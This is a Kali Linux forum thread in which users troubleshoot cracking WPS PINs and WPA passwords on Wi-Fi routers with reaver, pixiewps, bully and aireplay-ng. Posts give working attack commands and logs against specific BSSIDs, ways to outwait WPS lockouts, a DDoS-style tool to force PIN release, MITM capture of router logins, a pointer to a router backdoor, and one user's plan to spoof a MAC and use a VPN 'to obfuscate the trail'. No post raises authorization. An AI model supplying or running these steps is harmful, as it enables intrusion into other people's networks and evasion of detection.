Results 1 to 23 of 23

Thread: Have the WPS Pin - but Reaver won't get the password.

  1. #1
    Join Date
    2015-Oct
    Posts
    1

    Question Have the WPS Pin - but Reaver won't get the password.

    I've been able to successfully crack WPS pins no problem using Pixie Dust - longest time so far is 9 secs...

    Typically I use ... reaver -i wlan0mon -b (bssid) -vv -w -N -A K 1

    ...with aireplay-ng -1 10 -a (bssid) wlan0mon

    ... in the background solving association problems.

    HOWEVER : )

    When I go to crack the password - reaver just sits there with the auto command that it generates - something along the lines of cmd: reaver -i wlan0mon -b (bssid) -c (channel number) -s y -p (8 digit pin)

    No warnings, no progress, it just sits there...

    Any recommendations are warmly welcomed. I've just started three weeks ago and the addiction to Kali has begun : ) Thank you all.

    12167659_10207798234178268_325961263_n.jpg

  2. #2
    Join Date
    2015-Oct
    Location
    texas
    Posts
    6
    i was having the same problem so i switched

    -vv to -vvv

    and this is what it came up with

    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust] [+] WPS pin: 67047093
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running reaver with the correct pin, wait ...
    Cmd : reaver -i wlan0mon -b 90:1A:CA1:B8:80 -c 0 -s y -vv -p 67047093

    [Reaver Test] BSSID: 90:1A:CA1:B8:80
    [Reaver Test] Channel: 0
    ^C
    [+] Nothing done, nothing to save.
    root@kali:~# reaver -i wlan0mon -b 90:1A:CA1:B8:80 -c 0 -s y -vvv -p 67047093

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212

    [+] Waiting for beacon from 90:1A:CA1:B8:80
    [!] WARNING: Failed to associate with 90:1A:CA1:B8:80 (ESSID: Whiteside)
    [!] WARNING: Failed to associate with 90:1A:CA1:B8:80 (ESSID: Whiteside)

    i posted asking why it might not associate after i have already got the wps pin but no replys on it yet

    i might try

    aireplay-ng -1 10 -a (bssid) wlan0mon

    and see if that changes anything

  3. #3
    Join Date
    2013-Apr
    Location
    Kali forums
    Posts
    805
    If you've got the pin, you could try using bully to get the password. Not really an answer to your questions, I know, but an alternative

  4. #4
    Join Date
    2015-Aug
    Location
    The Pits
    Posts
    87
    Some wise unix-er once told me, "USE YOUR EYES." lol
    So look at the channel that Pixie Dust is sending Reaver to:
    "Cmd : reaver -i wlan0mon -b 90:1A:CA1:B8:80 -c 0 -s y -vv -p 67047093"
    Just change that to the CORRECT channel and run Reaver with the pin that Pixie found. Problem solved!

  5. #5
    Join Date
    2016-Aug
    Posts
    2
    i used command reaver -i wlan0mon -b (bssid) -vv -w -N -A K 1
    But nothing happens and the agenda does not
    but not used -k 1 , command work
    please help to used how -k 1

  6. #6
    Some wise unix-er once told me, "USE YOUR EYES." lol

    + 1
    And check the help in shell to understand the arguments... (just with your eyes)
    But nothing happens and the agenda does not
    but not used -k 1 , command work
    please help to used how -k 1
    Code:
    -K  --pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom & Realtek)
    So if you use K1 all time you wil just do a pixiedust attack and will never get the key.
    Pixiedust uses M1-M2 and M3 and doesn't go beyond M4
    You need to make a full WPS transaction to retrieve the key.

  7. #7
    Join Date
    2016-Aug
    Posts
    2
    Im steel work around Pixiedust
    i reaver 1.5.3
    and give this :
    reaver -i mon0 -b bssid -r 1:20 -vvv --pixie-dust 1

    Reaver v1.5.3 WiFi Protected Setup Attack Tool
    [+] Waiting for beacon from bssid
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Associated with bssid
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: xxxxxxxxxxxxxxxxxxxxxxxxxxx
    [P] PKE: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: RTL8671
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxff
    [P] PKR: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [P] AuthKey:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [+] Sending M2 message
    [P] E-Hash1: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [P] E-Hash2:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    [+] Running pixiewps with the information, wait ...
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.2
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s 749 ms
    [Pixie-Dust]
    [Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    [+]
    do work now ??
    pls help me

  8. #8
    Join Date
    2016-Sep
    Posts
    8
    Quote Originally Posted by pur3vil View Post
    I've been able to successfully crack WPS pins no problem using Pixie Dust - longest time so far is 9 secs...

    Typically I use ... reaver -i wlan0mon -b (bssid) -vv -w -N -A K 1

    ...with aireplay-ng -1 10 -a (bssid) wlan0mon

    ... in the background solving association problems.

    HOWEVER : )

    When I go to crack the password - reaver just sits there with the auto command that it generates - something along the lines of cmd: reaver -i wlan0mon -b (bssid) -c (channel number) -s y -p (8 digit pin)

    No warnings, no progress, it just sits there...

    Any recommendations are warmly welcomed. I've just started three weeks ago and the addiction to Kali has begun : ) Thank you all.

    12167659_10207798234178268_325961263_n.jpg
    hi there, I have been having the same issue, have you found an answer to this yet? I am totally stuck

  9. #9
    go to github, search bully and get AanarchyY's version. once installed, use -d and you should be fine

  10. #10
    Join Date
    2016-Sep
    Posts
    8
    Quote Originally Posted by bob79 View Post
    go to github, search bully and get AanarchyY's version. once installed, use -d and you should be fine
    thanks for the advice, I am using Kali rolling 16.1, which has bully already installed, no -d switch (-D is there but that is only for detectlock which I am not sure is what is required to resolve this one)

  11. #11
    Quote Originally Posted by vinneth View Post
    thanks for the advice, I am using Kali rolling 16.1, which has bully already installed, no -d switch (-D is there but that is only for detectlock which I am not sure is what is required to resolve this one)
    that's the official bully. as told, follow the steps above and install the other version

  12. #12
    Join Date
    2015-Aug
    Location
    The Pits
    Posts
    87
    Thanks bob79, I downloaded that bully.

    RE: Rev1500's post: Again, use your eyes, see: [Reaver Test] Channel: 0
    So you should run reaver directly with the pin, using the correct channel number. However, if you use wash first you may find the router is currently locked, as I have seen routers locked by running pixiewps against them.

  13. #13
    Join Date
    2015-Feb
    Posts
    1
    I have a similar problem. Have the pin, but no pw. Tried running bully with -d switch, but got the error that no WPS was found, even though it was within the string: bully -b 48:f8:b3:af:bd:76 -p 43077465 -B -c 1 wlan0mon -L d

    So trying to run it without the d switch, but keep getting timeouts. Same with reaver: reaver -i wlan0mon -b 48:f8:b3:af:bd:76 -c 1 -s y -vv -p 43077465

    Router is a Linksys EA2700. stumped.

  14. #14
    Join Date
    2013-Jul
    Posts
    844
    To shockme17

    When using reaver MTeams has seen this occur for the following:

    1. The Network is not WPA encrypted

    2. The mac has been spoofed thru either macchanger or done by NetworkManager but the spoofed mac address was not added to the reaver comandline thru the --pin= command. We suggest running airodump-ng against the target by setting the channel -c and the --bssid of the target in the airodump-ng command line along with reaver and check the mac address being used by reaver as it tries to collect WPS pins, which will be listed in the essidprobes at the bottom of the airodump-ng terminal window.

    3. Reaver is being run in kali-rolling. When reaver was run thru kali 1.10a the WPA code was immediately obtained. MTeams keeps a persistent usb available running 1.10a for cases such as this which in fact occurred again just last week.

    Musket Teams

  15. #15
    Join Date
    2016-Dec
    Posts
    9
    mmusket33
    Very insightful information, thanks. Since we're on the topic of the WPS/password connection, which tool will return the WPS pin when you have the password?

  16. #16
    Join Date
    2013-Jul
    Posts
    844
    To gmaslin

    To our knowledge there is no tool to convert the WPA Key to a WPS Pin directly.

    MTeams asked for this tool when WPS-Reaver was functioning.

    You can get this indirectly of course thru reaver-pixiedust if the firmware is vulnerable.

    Since you have the WPA key you could try accessing the router, go into the setup pages and read the WPS. Many routers are left in the default setting. We have found that ITT companies employees in our areas of operation who service clients and setup router software for customers tend to load standard passwords so when they return to fix a problem they can easily access the firmware as their clients forget the password.

    1, Best use burpsuitepro for brute force

    or

    2. MITM the router and get the username/password pair if a client accesses the router. We find Windows and Cain to be the easiest tools to use here.

    3. Then there are back doors - TP link has one you can find the howto in the forums.


    MTeams
    Last edited by mmusket33; 2016-12-04 at 05:32.

  17. #17
    Join Date
    2016-Dec
    Posts
    9
    mmusket33
    Noted. I guess the best practice would be to spoof your MAC and use a VPN before going into the router directly to find the WPS pin so as to obfuscate the trail. I have one additional question: What is the command to start multiple wireless monitor interfaces from a single card? Better yet, will you point me to the favored practice of unlocking the WPS AP in the latest stable Kali release?

  18. #18
    Join Date
    2013-Jul
    Posts
    844
    To gmaslin

    For multiple monitors go to the end of this thread


    https://forums.kali.org/showthread.p...ewer-airmon-ng

    Make a monitor with airmon-ng then make more off of the wlan0mon with iw seems best. We are still testing, This is the last suggestion in the thread.


    For WPS locked routers it depends on how the firmware locks the router. If it is time based meaning the router unlocks after x amount of time then you can set up reaver to restart a little time after the router unlocks.

    To find if the WPS locking is time-based set the -l lock-delay in seconds to say 600 seconds or 10 minutes. If the routers' WPS was unlocked start reaver then lock the router thru pin collection and count the number of attempts reaver made before WPS pin collection was again successful. Each attempt would equal 600 seconds so if 10 attempts were made then the lock=unlock cycle is approx 6000 seconds. Now set your -l to a little past that say 6500 sec and slowly collect pins. Watch the pin collection and refine your time as appropriate.

    If the router locks after x number of pin attempts and stays locked then see if it contains a pixiedust vulnerability.

    If unlocked collect a pixiedust data sequence and test it.

    If the router is locked just run up varmacscan (a MTeams tool available for download thru these forums) when your computer is idle and let it search. If the router unlocks then varmacscan will collect pins and check for the WPS pin thru pixiedust. If the flaw exists and the WPS pin is found then you can just run reaver against the router constantly until it unlocks. Varmacscan may also find the WPA key as well.

    Finally

    For locked WPS systems MTeams produces a tool call VMR-MDK BUT the VMR-MDK process only works with a SMALL number of routers. Essentially these routers if subjected to a short but intense DDOS process release a small number of pins.

    Musket Teams

  19. #19
    Join Date
    2016-Dec
    Posts
    9
    mmusket33
    Thanks! I'll be starting another thread with my adjacent questions.

  20. #20
    Join Date
    2015-Jul
    Location
    Around the World
    Posts
    7

    Exclamation

    @mmusket33
    I have been testing your "varmacscan" but after updating to "Kali Linux 2016.2" the tools seems to have problem start the "wlan0" in the monitor mode (tried both ways). I have even tried to write a small shell file to overcome this but the problem still persists. It would be better if you add the following to avoid the hardblocked case or "SIOCSIFFLAGS: Operation not possible due to RF-kill". So that the program while creating the "Monitor Mode" doesnt have problem with it.
    And can you say the command you use in the file with reaver and also aireplay-ng?
    rmmod -f <Wifi Driver Name> #Removing the Driver
    rfkill unblock all #Unblocking all devices
    modprobe <Wifi Driver Name> #Installing the driver module.

    Thanks.
    Last edited by 9h05t; 2016-12-12 at 20:01.

  21. #21
    Join Date
    2014-Mar
    Posts
    163
    For those that got the pin and cant get the password , the best way is to try to connect the AP with the pin itself using WPS .
    It could be a little tricky the setup , but if the pin is right then you problably will be able to access the AP router .

    Here it is how it must be done .
    http://askubuntu.com/questions/12036...ap-through-wps

    monitor the AP for a while with airmon-ng and write somewhere the mac address of the clients that connect successfully to that AP just in case the AP have mac filtering .

  22. #22
    Join Date
    2014-Mar
    Posts
    163
    I got here some APS where i could only get the pin with reaver , and i was able to catch the password of those aps using wpa_gui .

    Basically all needed is to use wpa-gui , register the AP and connect using the pin .
    When wpa make the connection to the access point using the pin , it will register that AP in wpa_supplicant.conf in /etc/wpa_supplicant folder .
    After all process done , all you need is to open the wpa_supplicant.conf file and you will see the AP registered there and that AP password .

    Sometimes what happens for reaver dont get the password is because you may have a very long distance to the AP , and communication can fail .

  23. #23
    I guess you mean wpa_cli and not wpa_gui

Similar Threads

  1. [Reaver][Kali 2016] Reaver Association Issues (Code 18)
    By h4ck0ry in forum General Archive
    Replies: 3
    Last Post: 2016-07-06, 11:54

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •